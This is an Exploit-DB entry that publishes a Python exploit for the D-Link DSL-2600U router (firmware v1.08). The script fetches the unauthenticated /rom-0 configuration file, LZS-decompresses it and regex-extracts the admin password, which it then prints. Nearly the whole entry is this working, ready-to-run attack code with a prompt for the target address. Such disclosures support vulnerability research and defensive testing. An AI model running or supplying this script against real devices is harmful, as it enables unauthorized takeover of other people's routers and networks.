D-Link DSL2600U - 'rom-0' Admin Password Disclosure

EDB-ID:

52576

CVE:

N/A

EDB Verified:

Author:

Amir Hossein Jamshidi

Type:

hardware

Exploit: /

Platform:

Multiple

Date:

2026-05-26

Vulnerable App:

# Exploit Title: D-Link DSL2600U - 'rom-0' Admin Password Disclosure
# Date: 2026-05-02
# Exploit Author: Amir Hossein Jamshidi
# Vendor Homepage: https://www.dlink.com
# Version: DSL-2600U
# Tested on: ubuntu
# CVE : N/A
# Firmware Version: v1.08
from routersploit.libs.lzs.lzs import LZSDecompress
import requests
import re
import sys
print('''
    #################################################################################
    #        D-Link Router - 'rom-0' Admin Password Disclosure                      #
    #                   BY: Amir Hossein Jamshidi                                   #
    #               Mail: amirhosseinjamshidi64@gmail.com                           #
    #           github: https://github.com/amirhosseinjamshidi64                    #
    #                    Usage: python expoit.py                                    #
    #################################################################################
''')
def exploit(url):
    data = requests.get(f"{url}/rom-0")
    #with open("data", 'wb') as f:
    #    f.write(data.content)
    data = data.content
    pos = 8568
    res, win = LZSDecompress(data[pos:])
    password = re.findall("([\040-\176]{5,})", res)
    return password[0]
if __name__ == "__main__":
    url = input("Enter Target IP (example: http://192.168.1.1): ")
    print("password is: " + '\t' + exploit(url))

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services